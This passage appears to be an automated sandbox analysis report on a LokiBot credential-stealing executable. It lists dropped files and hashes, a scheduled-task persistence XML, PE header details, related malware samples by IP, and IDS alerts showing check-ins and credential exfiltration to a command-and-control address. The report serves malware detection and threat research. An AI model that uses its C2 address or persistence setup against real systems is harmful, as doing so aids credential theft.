                              s-part-0017.t-0009.t-msedge.nethuuG7N3jOv.exeGet hashmaliciousFormBookBrowse
                              • 13.107.246.45
                              x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 13.107.246.45
                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                              • 13.107.246.45
                              Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              11626244731900027402.jsGet hashmaliciousStrela DownloaderBrowse
                              • 13.107.246.45
                              QQpQgSYkjW.exeGet hashmaliciousFormBookBrowse
                              • 13.107.246.45
                              ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 13.107.246.45
                              1r3DRyrX0T.exeGet hashmaliciousDarkWatchmanBrowse
                              • 13.107.246.45
                              TBUjHBNHaD.exeGet hashmaliciousDarkWatchmanBrowse
                              • 13.107.246.45
                              S7s4XhcN1G.exeGet hashmaliciousDarkWatchmanBrowse
                              • 13.107.246.45
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              NET1-ASBGYvVDV4cbjy.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41
                              EozUxz4ybi.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41
                              oAUBqI6vQ7.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41
                              IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 94.156.177.164
                              QUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                              • 94.156.177.117
                              Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                              • 95.87.199.40
                              Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                              • 93.123.77.220
                              Kloki.arm7.elfGet hashmaliciousUnknownBrowse
                              • 83.222.191.90
                              Kloki.m68k.elfGet hashmaliciousUnknownBrowse
                              • 83.222.191.90
                              Kloki.x86_64.elfGet hashmaliciousUnknownBrowse
                              • 83.222.189.67
                              No context
                              No context
                              Process:C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.379633281639906
                              Encrypted:false
                              SSDEEP:48:BWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:BLHxvCsIfA2KRHmOugw1s
                              MD5:707D84D53930CEF35303F95757D41DFD
                              SHA1:493518B676BEF7A575CC7F9AD46B2AA874FE0128
                              SHA-256:C7D5489CB7AEFE8BD66DBE86814498EBF4721C28B6E01AE93D2633E9FF127C65
                              SHA-512:B9DB31F55B1017E2B266124D1FB33A087642F0579952A9761B84EC6644A094BA150D78B2CE15A1821655283E308AF0FEB9CCEBCCA145F38F4926D075A7531F0D
                              Malicious:false
                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.094947991315112
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewZv:HeLwYrFdOFzOz6dKrsuqu
                              MD5:6D5905FF9B2D9E81A329A4B3B138205C
                              SHA1:598D6F17789A9BA25DF4DA4F65E4E33F3A8AAC25
                              SHA-256:CD8B0992764F7F63172F7B4CF5D0FA681338D7EB0D27861BDA5C7AF2062611DE
                              SHA-512:75022C91678179DE64817E1A76F046560F19A75E13D9480475612A22EF0169FBE16D3A93B1F6EE924CC5FCDD8F63BD408D44A6C669FF5E438DEECD8C5062E156
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.094947991315112
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewZv:HeLwYrFdOFzOz6dKrsuqu
                              MD5:6D5905FF9B2D9E81A329A4B3B138205C
                              SHA1:598D6F17789A9BA25DF4DA4F65E4E33F3A8AAC25
                              SHA-256:CD8B0992764F7F63172F7B4CF5D0FA681338D7EB0D27861BDA5C7AF2062611DE
                              SHA-512:75022C91678179DE64817E1A76F046560F19A75E13D9480475612A22EF0169FBE16D3A93B1F6EE924CC5FCDD8F63BD408D44A6C669FF5E438DEECD8C5062E156
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              File Type:data
                              Category:modified
                              Size (bytes):45
                              Entropy (8bit):0.9111711733157262
                              Encrypted:false
                              SSDEEP:3:/lwltJ:Wz
                              MD5:3D7D230E8E9B4E8202935E38050E13E5
                              SHA1:DFABCB8DCBC48AB136F6F87A29BF4A7C9CCCCAAF
                              SHA-256:269E9F79960D5201DA265CEF43575B1EF31644174DA7A9AB23501AD3A0CACFC3
                              SHA-512:02BAF2F6CE0222EBFD4186641AC8F8BF8C54D0184A6C4C85F720171EEF8B1871ACCC9F3E522B80C8814428F52B007CE321312A76B4538D59E4A436D43011FF30
                              Malicious:false
                              Preview:........................................user.
                              Process:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):559616
                              Entropy (8bit):7.657844809922727
                              Encrypted:false
                              SSDEEP:12288:9WFStAbHSWyMDswDGQKqHj6kN2YMdJ2U15usx+Xt:9Wk9yz6xqHT2YMdJ2U1x
                              MD5:55550B1C9E27A22BC17744FC5CBA030C
                              SHA1:02508BE8F94CD14E668D4892028A9A442671817C
                              SHA-256:8097164E911C48C3E99B7676138F793A19FEE809D2931090EC7C0C2F65073889
                              SHA-512:6F6C0E6B83DC96D58E9750F8C92C6F2FEF7B5699A4CE293B886123A9B0E3B9D572C5852B90C1F32CF0B9685304AC0729034B86B45229FEF59F19BE15F2799211
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................................@.....................................O.......................................p............................................ ............... ..H............text...l.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................H.......H........d...K......`....................................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.....*....0...........s......o.....*".(.....*.0...........s".....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0............o ....+..*.0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....
                              Process:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.657844809922727
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:kzQ25HVUbf.exe
                              File size:559'616 bytes
                              MD5:55550b1c9e27a22bc17744fc5cba030c
                              SHA1:02508be8f94cd14e668d4892028a9a442671817c
                              SHA256:8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889
                              SHA512:6f6c0e6b83dc96d58e9750f8c92c6f2fef7b5699a4ce293b886123a9b0e3b9d572c5852b90c1f32cf0b9685304ac0729034b86b45229fef59f19be15f2799211
                              SSDEEP:12288:9WFStAbHSWyMDswDGQKqHj6kN2YMdJ2U15usx+Xt:9Wk9yz6xqHT2YMdJ2U1x
                              TLSH:24C401582619DA06CADA97B80A71F27927BC2EDEEA11D3034FDD3DEBB475F101D48242
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................................@................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x489f66
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0xD20BEEF3 [Tue Sep 2 00:10:27 2081 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, byte ptr [eax]
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              and byte ptr [eax], al
                              add byte ptr [eax+00000018h], al
                              push eax
                              add byte ptr [eax], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x89f140x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x5a4.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x882b40x70.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x87f6c0x88000a00aac2d052041fed157140caec33e2dFalse0.8919731588924632data7.667730647457407IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x8a0000x5a40x600508daff929be2045d459567956c6d5b0False0.421875data4.07120350395674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x8c0000xc0x2008ba4dae81779ce4994033e10d4ef3206False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x8a0900x314data0.4352791878172589
                              RT_MANIFEST0x8a3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                              DLLImport
                              mscoree.dll_CorExeMain
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2025-01-11T08:37:17.283199+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94980494.156.177.4180TCP
                              2025-01-11T08:37:17.283199+01002025381ET MALWARE LokiBot Checkin1192.168.2.94980494.156.177.4180TCP
                              2025-01-11T08:37:17.283199+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94980494.156.177.4180TCP
                              2025-01-11T08:37:17.995289+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.94980494.156.177.4180TCP
                              2025-01-11T08:37:18.596493+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94981194.156.177.4180TCP
                              2025-01-11T08:37:18.596493+01002025381ET MALWARE LokiBot Checkin1192.168.2.94981194.156.177.4180TCP
                              2025-01-11T08:37:18.596493+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94981194.156.177.4180TCP
                              2025-01-11T08:37:19.336213+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.94981194.156.177.4180TCP
                              2025-01-11T08:37:19.430625+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94981794.156.177.4180TCP
                              2025-01-11T08:37:19.430625+01002025381ET MALWARE LokiBot Checkin1192.168.2.94981794.156.177.4180TCP
                              2025-01-11T08:37:19.430625+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94981794.156.177.4180TCP
                              2025-01-11T08:37:20.138790+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94981794.156.177.4180TCP
